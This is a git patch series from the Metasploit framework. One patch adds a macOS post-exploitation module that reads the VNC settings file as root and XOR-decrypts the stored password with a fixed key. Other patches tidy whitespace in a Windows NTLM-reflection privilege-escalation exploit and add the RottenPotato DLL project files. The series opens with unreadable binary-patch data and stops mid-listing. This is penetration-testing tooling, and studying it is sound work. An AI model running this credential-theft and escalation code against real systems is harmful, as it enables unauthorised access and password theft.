z_DFV`%V2HZW|}Ha;@`#I&RN%yNZ9b`e0W3BQnmpl7=TfL;G)lZ7I&8!ZZ2bKlT`AG zlwr4fkq&t3?j%(W4Ky4cWnDTzV}EXQvc2Ax%u4wDWSNPX_Ca+gMpABcX{5-#uk5=* zz__0rX(|rd#!5Cw)9yaTT^Q*S|aN|i|uK6pz0pCvGbuVMQ z7}02xedBHr#pha*gL7$P&ewiyu%pi1vaWDPRaMBg1HW8xZcozeVo-LxhQB_@WtOb- z%=BFCsjl63Xr*VmC+aD>uyoTBPp>QfRinE)ygcd-cnS3FJF7>NxomDWQ}&V`+u6L+ zR21bRKHCJY3D^OGdebYspcRG(sYCy0LPihDTZah)j9V$;Bgwl9>7(NZSB(jx1DRD0 zM3UxbrzclVH#xuId(53;7{W^V#w^O6&V~~)Ek9m%*?|?*r57YV&M2r^HkGindaoP( z&A>2YN#xhcGGVKXm!$1_tpmkh`n4dkk^8O6amng0&QR{$Y%oS&b~iityrlhPx6ITq zmSOfabf^ejuDrgdhfEbqcz2yp%%?WRa-yi`)$Mjqf8G5`-wKzN=hoYrTdTMgo7zeL zn0E^xQ8t382Mbt_qGW{jvAXPeyZ%udT7Io}L(lcAhqJMl1AfLOXc{&BOOlOfqJn=K zuufuzZyqovI!3}fKTe*vb{$J_|2@->4Km!N9;cOV#>^(c3$&4YM&fdqNl_iW+` z4oR5Plhbx3tGis*(a}~kl~=X-PGaxmgA46Zp+m8E_-DJB)%elWW{g7KG#EgRWA0@b ze{675Ec{~cHCAr#lO;uy%o9O*!8FYC=bEM=e5Z%&c~j&*kEPlnei&Kz2!}D7?#tUw zdNta9iKE;dVT1&S@5PwicCPl1urx>eDfX>iy4TI@N6Y%v&be%SLvxVIbNSUyGsQ_W zVm~~7&UD2ea}6RbJ$NICbYOC_peNj<_c(34%cF_3P1*7E)B(~D{MhgM?n?LsUtV)r z^I5Qnx}D-_csPbO#qZ{+>lxjTeaVt@uj~W{mZ87(Kc_|+%hNp zNjJ8j`_#0X=Ag((ZPj->UC%haM~{K!RfYm%RP*SoZP>K-E) zkwEL)I)KxL>qD;{rW|Q>V?Sx9@a4cgy}l2Dp-uAku6-(lx54n})Zw=mBxap=`ss*%#mkQy+z`Y-A#>}m zmu;*Gx_N;YvZ;)A0?qcdtT64j@vMz13%-SWfZT9U9(klC%50_{m%Xt&`TZxp2E0^f z4taYo)#iTtqc!j9-}b8<-VHW)6*0~~)i@YKUyUM<}_rt6O0;)on{lGuC|*;|{{z`aECchlXFu`|zXnZGi8t4q~H z<;7!l{Fefkedsseo!N6`ExU5(&HIeaf$Nt$?%Dfjc)06&vj0~O1!ip%r7%6L+vBI2 zpcr?%0G3$Hp&4|44^I~T+3l;yL3Z1GlkUAJZai^3fcjSSOAU633wsM+t7(nA?be2r zFAl@)=axJDGH%bvFY0k?!Rv;QIF44F5OByCzm_m>dwIIiLqIY*)K$GvV%w%Z872(; z+x=Az<@1x(Hk}2P(JR(#ryAQVE~sdATxA?BBjt|64jP+|WB#c{^nDWU9f61+_q6jf z^N8`4ZUMfPAD8HuLdYhi_*yRHZdrZ;urV*gYId+dH z68n|yTF-W6{%z ztGWTijLTkiJ^ABEWWV{#mIfJ*GTLfDj#@slH^y}o`TP11FWY^+z4t@XS9S^7)cB*! zvA$G1*KL{SX>0%Nzay}!JmCip0F~z-#l=sBz1JV~*21!mM?B2&u=2=N+wzU=eukh6 z)!AFUxxCNwcQ&AJMckn^eRgTxKjTaCNz3D(VXtiSd+Jl!HVEeJP#ecA%5 z^A?|Ro`3IjxL(^g;C!MVTanyz$RoOuXzHsp zWnB0}?eb8AJXR!h;IQTXB_g$@nw%JlkZ>=A;dls_0l4FqM$5Nk;B}D#=3#Uvu?=8l z(g8h!1_-bE7d7`jb!Afl`y$f;vlY{+5&n&$Z$}9EF5h}?N^r$<=Z&1XvM7Tb&0IjP znAhB^&=or8IAe?L#5NK1(w>}R!cqsDXdA>%mtki(D4!s%MZ$Nv;|GDq#+s45BwJ!B zmOwo-THixJ$RUN~KjG{0icPI#BsC;;Aq%61FdA;IjBv)sB7p4FOm8^*XD5slBA)2? z29&D4hQ#B9h-l0Uoac-Vk2E-v0`Y2Nm;^JRL9Q zGMCY`jSfY`Olmqp)l=UidzSs6ZuauTLhQwih+W9iMyFSsgB|Ry*xL4oxtVwx&>~4XIGT|oecj*#rZn&fW7?2;Xb@7g8T@- znGPIqTZ$&n?8Il%9dT?&7kai+&14Aq=IHP^%?ZznAp7G%1Ucusral#ZAY4i2p1iEx zctcC)k(c6+(QC-RHn{!Cgl`E8ueEW-UphmqGt*h*RfZvYhEDr;Gg*UAUPgY4Ue^G9 z$Uoo%=wsvBSAPCWEU-2!|Zy@l_((<5=lN9bTp*U!&)F9v<0r z5`S<=?$Gf^Ndq0Ovsc37%69pcp z*t%LPQI}-k3#x9LPK?Wiip9^X!a~u}45rU}bcVmXpA_3FKaoRLOMEE>c1{#V z&byjJfvR^jjt5VD(i9zbTtQyJtiEx^^o3Hhr65Md+7w$gqEcmtVx{tkgnp-AI>6X# z-fRlEE8a;0M-`LI@8K-v$JrqY#ongAIQgWbL$GxcK)m89JBY&(!r{1tQUTg<<0417 zGXikIq?iergh|VYPU6)VhfKSD;vDnt_Eda(7GdKMohs&7GcFzQVi3>NUDd;x0@DKuhdlq29Y~m;gt~Or0IC;o zDX2b^%M$3}&zy?K2(vl`&TH1Ldoc?&zR)#hv7p9tpu%E#G1L^=iR!v6LmAK)F=4oe zZ3a(NH#%i!+T;AN4K)%%bpIsoVHJ6!x+hb`Zn}E}0}Iu)5a34df*Q*Sn)|v|!X6gJ zLM<)3U3B-5JuE0jv||t3ruaE#3TkQJ?Sfi5_BbOZE$z49>K~1K1omupEx(s*%(@}G z+NE`X!ffcKUWM+uF$=RQ2Ihx~hGu;_t&W{qw!T%@f}7sMAe6b_nh~_}33zC+*tHJD zSS%K^ZWF4XXtIufK83}ZG%wmiMs*!XT!oqz_j)m@qWmcnBP|+=LyG4|xoEu%WM4Q( zv@kCPK0s)D~=&A(wy}U*pxk3-d%C!tfN! z{$VTgCUmxRP+G7XsQ#a*{;}oK&&N^yJi|4*#@u@`dVeS+md$b1dJX#$7J(si@$TSL6kh3ycCTXN3Wov4GmyTu@^& zw_*!Gqc3W$eiZ@(e56nVe7H~pe9Z27l~_lv|1Z|eXb%Bwm<>e5TvBs#>x`54FXU8c zfI{7ddH^yJ00w6qKz1GgaYBtoBF~3S$#%I+p^5j=sueLB(PoKUs0orwMQWu+S%3wJ zl=2v%Mjl)g>cfGb;L-w#23t4NDNT z>SLW~TfcskYQ9>uS&G4KORI(fgmQ6Y1k`HtWl~YPq$E?hRic0?7l@+r!}Ftsp_0%j zNqD}`lDLpR<}-H*A#+#t`)i1MCZE3A-~5-%-4`oe1ZT;^aE|=^iiR?Gh<~+`XXR^V zY5pu#&(exnI_JCh4}5ycnw2Sn@UY-yfdH&nyDn)BESp#+13;h@iml(ZLUjorfMpUa z16GVL7OP>^0GRpamqD4ebkBG`?0MnncvhRLmPp`<3uef43Ujl1>?Hhrg%bN&w7|S5 zP?iCqf^X4023P#P%mntMhLK%2&Kj-

!6HSj+jJ J^>3}fe*r4G?%n_Z literal 11264 zcmeHN4RBOdmcE^IhY*Mzz{a3PAE9wr9YaXt7zojBlgJIcV1xh}hq38&UPx=FyX}6B zFzdKv8%DaWZBaXpKRZ*7j_#B@<0?~Zjo>(%NQMxNETFSSu~t-^Z463qEMe50x8J$% zb!b4htlFxrt=m>&G1mE`A{P5iYH4n4j8!U=3MMi(6_n{Fb^e8bWfI?HBS3foV-9-Z$w9UW z9XQXkkA}TqH7Di3xqXYW05TxTJD;&dBycTb+evgQW8G3A5%I*vC7AuM`mV;*d^u;$ ztJ1X%I%reKTxzs-3WB^xfmK!U&VU|(t&=bSnQStey~ zgSJaxY_l+BrWV?gPA;x1PSvtx(H@%(x*)DziX$C$5|ifFnkbonm5Gx1H72S+-&~-i zZw~a$1`d6f!~C4>1idSG>KK-~q^w!I&c#H-^~R-)sbYk0=}Vr+h3amF5j-`Zd~Y{T z-{G$I^zqb?(JVgu=t(ZnZx*}x$phRNN>4Jm@}&wx!oAFX zOzG`X5WLpAR$@|mw~4}Qy)hGo*LpXYsB(tLL9fghkX$afU9gO5D==I~v0psBxQsk> zEtEa@fn3TaNZ{#0$l5Bg23pEC6D@N--TMI0u5?5B85(N(@>W2egQwMJ!o7`RP)g6_q^sf&QbD75*KkEm>B(PlVM!M+ z8?IhZH(diWP1E&DNvAK<=!TBJ(x!U)q-vZ&U;4aJhi^|4!@=0Y#of{Y+%ueYVe!0o zfIQ^8+4p_l8vo5^Nadw6d2nA~Ov2o2Jl@JF-m1CyL7BB=aV-}gHD!zcHn%{@mIFL{PM2L~J73P=b( zKjx-h#PaqUt~x1ajoZr+h^>@;2CDtz$3dQ#>;;%L3OAe)8RiOBa&e4{rZS^!==7xF zt}f@Ln@Jbrb)~QW4P(hEyuZJ!>tw%SBn$q$oA(cu9lZ+9vhw3D2LBnZr=%_BN`6gv z+R-^zf|Ufe97;Me4Ytu)JT;4Drx$^gDP0VZ{RmY9@VNllKj9@!MMlMW7YNk$VxI0U zTx1_nLD{Ei4d@7T8)h=)7kZ*@I|0o^~t*N#nvko2nNs z+KWfac-?OO!d+R^y@o3_gVc?2=Wi+=ufjs#9WC}up#TZTnPkm6_Tz4#f6JPK{rk^leF^uvB zO-z4}ix!BPLw(x))r6#*nDGi!TrMR|mSd$ZbR^5??&$r^ zVi@NDtcGivl;JpXC5dvp2av8G#JjQXxO2<9WaM4-&!d0zHQ=7UqkjZQeQI-V83Z!! zCvp5-Pkk4vEl=GE0q~T=a@0C>>jw47rl0P@2992Xj8RRdWJ+fM3_7j_54knlf#JHr zLfkA9Yxu>M*q!YB|1yjm*||A`$>T#IEXEv48MfqA_-f9>nCBo(Yr)ufXY6ysP({Vt zIL<8)J}EcgGhW$Zz!0M_dG)x|-C#aBa?#MNm&EI7q-p(P*!W9KB^!}-OuKTnjuv56 zYuw79KuRpWHPUZXvz-3MHj7i@4K7Z=8%am@d7LWbG=UJthnA`j z`GJJv{YS-L4TJm+dy4Tr+Df~WDQ$*V4cG5nG_PVlwoirp_9o;2B*L{+Vzp;|@B@ca zTX_n5$#fq_Hmt>b2xx?X7^)`BOV}KqaeRzr5U!|HqN$=0n=c^FGn73J3r8!t*zA@D zq#b=QfM=|3st-$Zv=9mYB9L}mK*GSkjr64*<)98aK6EoS(a!n?9a&&z#5w*2D5>qn zen3wyO6Xc?QSIbSPycQJeg&y23f_xF` z5>H?60{YWIa`H2iu!OD!HGq-}8I_ec z;gDV;Zk(*v9gLRBx7`R3Z zWp9Clu;$8^EBc$oexht8mx1IIUUz@?(v$mBhi#(;xzD>XTbYKvpFLH+pPfqhbMoB{ z3dyH~iYlf4e)MsPGF(?<*vy%-bR<8@az;TEADT&%I^C#^pRf7FTUS1K1^Sfi`N{n_ z3j-J)T~CEzwc)xJa^!v(u7N4|}|{XPU4vyaL5hw?op-yg|$SiWz@ zJ9npR5-7OeP{oih_3kO(C(N#j1Nt^ z5orl*SqV<~`F$!4(=Btju!-Vyi#ywbTuJiemns(>dHjQp76l8&V{(lPG7s9RFP@&S z&*mBGt##mUGR}MZ1^$_G5E9=!Ump*QU1hGd=sPByZoz5`4#}s_7H(Bsb3vRXGeHMJk zg6~`N-n8I;3%+2%?H2q;3vRRERtw%~LEVD4Sa7WcS6OhG1#2w5AD^|J+`7(&-sxhSk$OxzYm&!5z=~=LTBn$>n&i>G z72=N&A+#ZD{zSWt*{@?PH-10(UPK$iI6<2=ZY!~~64+K!QxrRU&Jn6z&`7?7(xwvF zRLq>qC&lmyWQXw$ccRL&&&L|jC%heP40}4WxPTSUzx!NT+dXH@n^8G|mDzs8CLW%! z-_chXD_9E|uv4)^x3sTF+Gm?*XY=$TT7R|Whw4qxn|r(z`?zH*R!$-MW1u}uH}5Zb zzR5qPWB#x5Pq%$_Af#U(jjzDT4r@1b+=64z+U=`CaXlFb`{)od_Q%2%n%)#yABsmK zlxkK5;-NrCSo5(*SwmdIDQ)Wp=wxhZ)AD6as;8!^GaP2@342#u(-`~D0)H$RjwUqr zp1nsNY(y|<(U=y&&E0|Qq-#BlUEx4_hy-IB*-!0V>oh&ViX4zDjd<1$f)-hi%kGL* z4a*l)OBGk!{8}W49}yue6rpsqtiW%o@CV~M+h;@C3+Wi>VgGg-_iL;+H?z|pNy6AG zZT?Q}3`y@Wf1oF^&aZ6<>5P4s`TY(41kz%tD-`s12O^ze%6>NyJr-*Z#`Nn$VX`0v z3UotUM{?adE$;7*MsH<*OVqFyi1;ag%4F=P#;(AG6Ij^%C>+TE=1NP z<@E)ANj*~FwM_%w;p|*xfH3eyN~2(P*utHLfKfl-*yrTn}3zvNCdeD1x2eMl=;GO~$TI zMuMcEDWX&2PSZ$3Af_kdT0<0z#V?J+tTB|J5HbTt4Ryo=@r@1G>I7R>cwz{=V}!CNH(RY=}SO+n4D9kn05`TtTD!OL!|_UmmWYz9;&2 z@b8DP?P!}oI{{e}7UK6xv}@6pqTP%ZMcaV3741H>pQAm6_ItEHpuLLrHri3NQ)pyq z0e-o+^$a#nN!%=-+Xz1&L+yhJcrc`*G`Sj(w7X%Au2OE zLJ@5}qB#%8Q8;@T5+RCs#+eDp=al`^Y#X$o$q(cVHtLVFAxTIsz9Da z>PjAR=hyVfUFl!`zH+eZRk}`^&)3u)U%O>fo{FP=8+9Dzrzeo76yTJv_M&a@nE7iN za$7lY%5fuTM9;51^XpEkKc7Q;6FdZ8MH>cA@FL{IXMs}=eGTmik^}e=+TBE-&e%g} zwewLo0{*2OI%^oC-#zAC2${g?|K{9=M)v4{&*4Y2IlzYj??4S+3!LDO(a28vjd2)_ z)@6 zIKg);oNE0kib??s)_MYoD|qD}s;<1Iv_w%B>G5PjZ^m`@D@ya2^Dr}^1(WfRzER3i@GOdJwuimO)}tg? zrzOS*^M{-8nMqPrqiXB5uo9+sePtlg99bW|Rf|_D$&fEd1z3G$S0J3wDz8~IcU<r{wh#kxd49_sF_z?Q&Ux2N&lmd78;HF;=%5ajvE6i zJNTlf^E>k~n(PRNf=jiHZSYG3+twAV?eKIg2+Y&w)oPv&a?IKGSe7oD`^9TGO_!@Z qJ^z|kUt?qQvc>J~7V=I1f9DT6)F@He)<+(G Date: Fri, 10 Aug 2018 16:25:33 +0200 Subject: [PATCH 012/192] Ruby decrypt The decryption of the key in the msf has been added --- modules/post/osx/gather/vnc_password_osx.rb | 40 +++++++++++++++++---- 1 file changed, 34 insertions(+), 6 deletions(-) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index dae448480a..6464207edb 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -23,6 +23,35 @@ class MetasploitModule < Msf::Post end + def decrypt_hash(hash) + if hash == nil or hash.empty? + return nil + end + + aux = ["1734516E8BA8C5E2FF1C39567390ADCA"].pack('H*') + fixedkey = aux.unpack('C*') + + str_pw = ["#{hash}"].pack('H*') + array_pwd = str_pw.unpack('C*') + str = '' + + for data in fixedkey; + str += (data ^ array_pwd.shift).chr + end + return str + end + + def getFile(filename) + begin + client.fs.file.stat(filename) + config = client.fs.file.new(filename,'r') + value = config.read + return value + rescue + return nil + end + end + def run case session.type when /meterpreter/ @@ -32,19 +61,18 @@ class MetasploitModule < Msf::Post end print_status("Running module against #{host}") - unless is_root? fail_with(Failure::NoAccess, 'It is necessary to be root!') end print_status("This session is running as root!") - print_status("Checking VNC Password...") vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt' - if file_exist? vncsettings_path - password = cmd_exec("cat #{vncsettings_path} | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'") - print_good("Password Found: #{password}") + passwd_encrypt = getFile("#{vncsettings_path}") + final_passwd = decrypt_hash("#{passwd_encrypt}") + if !final_passwd.nil? + print_good("Password Found: #{final_passwd}") else - print_error("The VNC Password has not been found") + print_error("Password not found") end end end From 41dd8a62cb35eb575c2f3cf888e491e595cc3b2b Mon Sep 17 00:00:00 2001 From: Kevin Gonzalvo Date: Fri, 10 Aug 2018 17:27:19 +0200 Subject: [PATCH 013/192] rename class name rename for snake case --- modules/post/osx/gather/vnc_password_osx.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index 6464207edb..4d6053cd37 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post return str end - def getFile(filename) + def get_file(filename) begin client.fs.file.stat(filename) config = client.fs.file.new(filename,'r') @@ -67,7 +67,7 @@ class MetasploitModule < Msf::Post print_status("This session is running as root!") print_status("Checking VNC Password...") vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt' - passwd_encrypt = getFile("#{vncsettings_path}") + passwd_encrypt = get_file("#{vncsettings_path}") final_passwd = decrypt_hash("#{passwd_encrypt}") if !final_passwd.nil? print_good("Password Found: #{final_passwd}") From 75736415adcaec7ed6c2a6d019d3a6bbe3546975 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sun, 12 Aug 2018 07:12:24 -0400 Subject: [PATCH 014/192] Update ms16_075_reflection.rb --- .../exploits/windows/local/ms16_075_reflection.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 077d31fd02..b246f63c98 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -19,9 +19,9 @@ class MetasploitModule < Msf::Exploit::Local 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', 'Description' => %q{ Module utilizes the Net-NTLMv2 reflection between DCOM/RPC - to achieve a SYSTEM handle for elevation of privilege. Currently the module - does not spawn as SYSTEM, however once achieving a shell, one can easily - use incognito to impersonate the token. + to achieve a SYSTEM handle for elevation of privilege. Currently the module + does not spawn as SYSTEM, however once achieving a shell, one can easily + use incognito to impersonate the token. }, 'License' => MSF_LICENSE, 'Author' => @@ -63,9 +63,9 @@ class MetasploitModule < Msf::Exploit::Local if sysinfo["Architecture"] =~ /(wow|x)64/i if session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"] == "\x00\x00\x00\x00" - arch = ARCH_X64 + arch = ARCH_X64 else - arch = ARCH_X86 + arch = ARCH_X86 end elsif sysinfo["Architecture"] == ARCH_X86 arch = ARCH_X86 @@ -120,5 +120,3 @@ class MetasploitModule < Msf::Exploit::Local print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end - - From 9bc21ba99471507f46c236707b677fa337935830 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sun, 12 Aug 2018 07:12:44 -0400 Subject: [PATCH 015/192] Update ms16_075_reflection.rb --- modules/exploits/windows/local/ms16_075_reflection.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index b246f63c98..843ba37af8 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local [ ['MSB', 'MS16-075'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], - ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], - ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] ], 'DisclosureDate' => 'Jan 16 2016', 'DefaultTarget' => 0 From b3f91394a1eefb3cf1c2c82711a8e9149d4d1c81 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sun, 12 Aug 2018 07:13:04 -0400 Subject: [PATCH 016/192] Update ms16_075_reflection.rb --- modules/exploits/windows/local/ms16_075_reflection.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 843ba37af8..bc8d7cb6d2 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'FoxGloveSec', # the original Potato exploit 'breenmachine', # Rotten Potato NG! - 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', From 1e2d3ad2f5f1e9a337e24264867a2c4751567d7e Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sun, 12 Aug 2018 12:40:03 -0400 Subject: [PATCH 017/192] offer travis a sacrifice --- modules/exploits/windows/local/ms16_075_reflection.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index bc8d7cb6d2..7885edf1db 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -18,9 +18,9 @@ class MetasploitModule < Msf::Exploit::Local super(update_info(info, { 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', 'Description' => %q{ - Module utilizes the Net-NTLMv2 reflection between DCOM/RPC + Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module - does not spawn as SYSTEM, however once achieving a shell, one can easily + does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token. }, 'License' => MSF_LICENSE, @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'FoxGloveSec', # the original Potato exploit 'breenmachine', # Rotten Potato NG! - 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', @@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local [ ['MSB', 'MS16-075'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], - ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], - ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] ], 'DisclosureDate' => 'Jan 16 2016', 'DefaultTarget' => 0 From 7a26960b1165329d45d7d0d579d4d04260132a08 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 18 Aug 2018 06:46:38 -0400 Subject: [PATCH 018/192] Oh holy travis, accept my tabs and spaces! Fixes the damn tabs and spaces. im gonna be livid if this doesnt work --- modules/exploits/windows/local/ms16_075_reflection.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 7885edf1db..3baf413547 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'FoxGloveSec', # the original Potato exploit 'breenmachine', # Rotten Potato NG! - 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', @@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local [ ['MSB', 'MS16-075'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], - ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], - ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] ], 'DisclosureDate' => 'Jan 16 2016', 'DefaultTarget' => 0 From 06a5df3ad3edb2423496edb938e53dfe14f9bade Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 18 Aug 2018 07:12:34 -0400 Subject: [PATCH 019/192] Travis the the PR: A love & hate story --- modules/exploits/windows/local/ms16_075_reflection.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 3baf413547..535ca59138 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'FoxGloveSec', # the original Potato exploit 'breenmachine', # Rotten Potato NG! - 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', @@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local [ ['MSB', 'MS16-075'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], - ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], - ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] ], 'DisclosureDate' => 'Jan 16 2016', 'DefaultTarget' => 0 From 5d6aaf60bb221157a5a039bec541a62f4e0d2ca2 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 18 Aug 2018 07:22:59 -0400 Subject: [PATCH 020/192] 300 : "THIS IS FAILED TRAVIS!" --- modules/exploits/windows/local/ms16_075_reflection.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 535ca59138..c573cb3a78 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'FoxGloveSec', # the original Potato exploit 'breenmachine', # Rotten Potato NG! - 'Mumbai' # Austin : port of RottenPotato for reflection & quick module + 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', @@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local [ ['MSB', 'MS16-075'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'], - ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], - ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] + ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'], + ['URL', 'https://github.com/breenmachine/RottenPotatoNG'] ], 'DisclosureDate' => 'Jan 16 2016', 'DefaultTarget' => 0 From 48255d6173595e32f7a1086d12ee5a2fd033fcc7 Mon Sep 17 00:00:00 2001 From: Mumbai Date: Tue, 21 Aug 2018 11:07:31 -0400 Subject: [PATCH 021/192] add soluition file --- .../exploits/rottenpotato/MSFRottenPotato.sln | 32 + .../{ => MSFRottenPotato}/BlockingQueue.h | 0 .../{ => MSFRottenPotato}/IStorageTrigger.cpp | 0 .../{ => MSFRottenPotato}/IStorageTrigger.h | 0 .../{ => MSFRottenPotato}/LocalNegotiator.cpp | 0 .../{ => MSFRottenPotato}/LocalNegotiator.h | 0 .../{ => MSFRottenPotato}/MSFRottenPotato.cpp | 748 +++++++++--------- .../{ => MSFRottenPotato}/MSFRottenPotato.h | 0 .../MSFRottenPotato/MSFRottenPotato.vcxproj | 195 +++++ .../MSFRottenPotato.vcxproj.filters | 66 ++ .../ReflectiveDllInjection.h | 1 + .../MSFRottenPotato/ReflectiveLoader.c | 572 ++++++++++++++ .../{ => MSFRottenPotato}/ReflectiveLoader.h | 0 .../{ => MSFRottenPotato}/dllmain.cpp | 158 ++-- .../rottenpotato/MSFRottenPotato/dump.stg | Bin 0 -> 16384 bytes .../{ => 